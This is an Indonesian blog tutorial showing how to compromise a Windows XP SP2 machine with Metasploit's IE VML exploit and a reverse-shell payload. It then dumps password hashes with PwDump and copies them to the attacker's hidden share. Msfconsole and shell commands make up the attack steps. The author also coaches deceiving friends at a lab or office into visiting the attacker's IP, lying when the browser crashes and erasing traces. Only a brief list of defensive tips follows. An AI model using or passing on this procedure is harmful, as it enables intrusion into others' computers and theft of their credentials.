Setelah mengetahui sedikit dan konsep dasar ?standar? mengenai hack yang
dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit
pada bagian kedua, sekarang langsung aja kita praktek. Disini saya
sengaja menggunakan VMWare ( http://chaidir.wordpress.com/2006/11/14 ... vmware.com
)untuk melakukan simulasi, karena tidak semua orang dapat
mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita
dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu
jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya.
Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem
Operasi yang saya gunakan adalah Windows XP SP2.
Tools yang saya gunakan adalah Metasploit Framework ( http://chaidir.wordpress.com/2006/11/14 ... vmware.com ) untuk melakukan exploit serta PwDump6 ( http://www.foofus.net/fizzgig/pwdump/ ) untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?
The
Metasploit Framework is a complete environment for writing, testing,
and using exploit code. This environment provides a solid platform for
penetrationtesting, shellcode development, and vulnerability research.
Untuk
penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca
dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan
instalasi metasploit versi 2.7, dibutuhkan user administrator.
Sebelumnya saya mencoba menginstall dengan ?limited user? tapi setelah
diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini
hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus
mendapatkan user admin serta meletakkannya dimanapun tanpa harus
menginstal di Folder Program Files. Namun setelah sedikit dioprek,
ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males
juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi
3 Beta 3 ( http://metasploit.com/projects/Framework/msf3/
), kita dapat menjalankannya tanpa harus menginstall dengan user admin.
Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan
fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum
bisa dijalankan sepenuhnya.
Ok.. sekarang saya asumsikan anda
telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p).
Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan
metasplooit yang menggunakan console (mfsconsole) saja. Metasploit
menggunakan cygwin ( http://www.cygwin.com/ ) untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!
Pertama2 jalankan ?mfsconsole?!
Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ?help?.
Karena
komputer yang ingin dijadikan target adalah Windows XP SP2, maka
digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan
memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code
Execution ( http://www.microsoft.com/technet/securi ... 6-055.mspx ).
This
module exploits a code execution vulnerability in Microsoft Internet
Explorer using a buffer overflow in the VML processing code (VGX.dll).
This module has been tested on Windows 2000 SP4, Windows XP SP0, and
Windows XP SP2.
Untuk melihat info dari exploit ini gunakan perintah :
msf > info ie_vml_rectfill
Exploit
ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh
karena itu, exploit ini akan berpengaruh jika komputer target
menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu,
kita harus menggunakan sedikit ?social engineering?, seperti jika di
kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba
membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE
ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1.
Biasanya setelah exploit ini dijalankan dan komputer target telah
terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan
exploit ?bekerja?. Setelah beberapa saat bilang aja ?wah.. ada error
nih. Ok deh.. saya coba betulin dulu? makasih ya?. Baru tutup IE-nya
pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa
untuk me-?end process?-kan ?dumpred.exe? juga, tapi setelah exploit
bekerja ).
Untuk menggunakan exploit gunakan perintah2 berikut dalam console :
msf > use_ie_vml_rectfill
msf > set PAYLOAD win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit
Hasilnya akan tampak seperti gambar berikut :
Dalam
contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128,
sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu
?payload? yang digunakan adalah ?win32_reverse? dan HTTP PORT nya adalah
80 (default http port). Setalah menjalankan perintah ?exploit?, baru
kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya
ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan
terkadang tidak berhasil. Jadi coba-coba aja terus
Jika anda berhasil, maka anda akan mendapatkan ?cmd.exe? dari komputer target.
Crack da Password!
Nah,
setelah kita ?menguasai? komputer target, skalian aja kita lihat
password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack
Win XP SP2 Password, tapi karena ini remote maka kita harus
?menyediakan? program yg dibutuhkan yaitu PwDump. Agar cara ini
berhasil, saya asumsikan pada komputer target user yang sedang login
mempunyai akses admin. Klo user yang digunakan komputer target yang
dimanfaatkan IE-nya hanya user ?biasa?, pwdump tidak akan berhasil!
Pertama
kita share dulu PwDump dari komputer kita dengan full access agar kita
bisa mengupload hasil dump password komputer target, tapi dengan akhiran
?$? biar tidak terlihat dikomputer umum. Misalkan nama folder yang di
share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump
dengan Map Network Drive dari komputer kita dengan ?net use?. Contoh
perintah yang digunakan :
Setelah
itu copy Pwdump ke komputer target dalam folder sementara, ?temp?.
Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump
dengan perintah
C:\temp\Pwdump ?o pass.txt 127.0.0.1
Klo berhasil akan tampak pada gambar berikut.
Lalu copy file pass.txt ke komputer kita
C:\temp\copy pass.txt z:
Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.
Nah, udah dapet hash file nya kan. Tinggal di crack aja deh?. (baca artikel sebelumnya buat nge-crack password). ( http://chaidir.wordpress.com/2006/09/24 ... -passwords )
Sebenarnya
masih banyak yang dapat dioprek dari metasploit. Dalam metasploit
terdapat banyak exploit, payload, meterpreter, dsb yang sangat
?menyenangkan? untuk dioprek. Untuk mempelajari metasploit, disitusnya
terdapat dokumentasi yang lumayan baik.
Happy Hacking?..
Beberapa saran agar windows kita tetap aman terhadap exploit diatas.
1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.
2. Patch Windows anda.
3. Gunakan antivirus dengan update terbaru
4. Hati2 terhadap teman anda sendiri.. waspadalah!!
Tidak ada komentar:
Posting Komentar